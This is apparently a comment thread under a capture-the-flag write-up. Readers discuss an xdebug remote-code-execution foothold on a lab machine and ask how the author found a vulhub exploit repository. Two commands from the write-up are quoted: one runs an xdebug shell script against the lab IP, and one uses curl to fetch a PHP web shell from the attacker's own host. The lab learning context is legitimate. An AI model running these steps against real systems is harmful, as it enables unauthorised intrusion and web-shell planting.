Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!
Lesson learned, thanks.
Thank you very much for your writeups.
May I ask you 2 questions:
I wonder what keywords in Google you used to find this github.com link:
vulhub/php/xdebug-rce at master · vulhub/vulhub · GitHub
I tried these keywords in Google without success.
xdebug exploit shell
xdebug exploit rce
xdebug exploit repository
xdebug php exploit
…Question 2 has 2 sub questions:
You wrote in your writeup:
./xdebug-shell.py -u http://10.10.10.83
curl -O http://miIp/shell.php
…Is this “xdebug-shell.py” the code copied from
the IP address of my Kali Linux?
Thanks a million.
I guess the keywords to search on google were:
php debug rce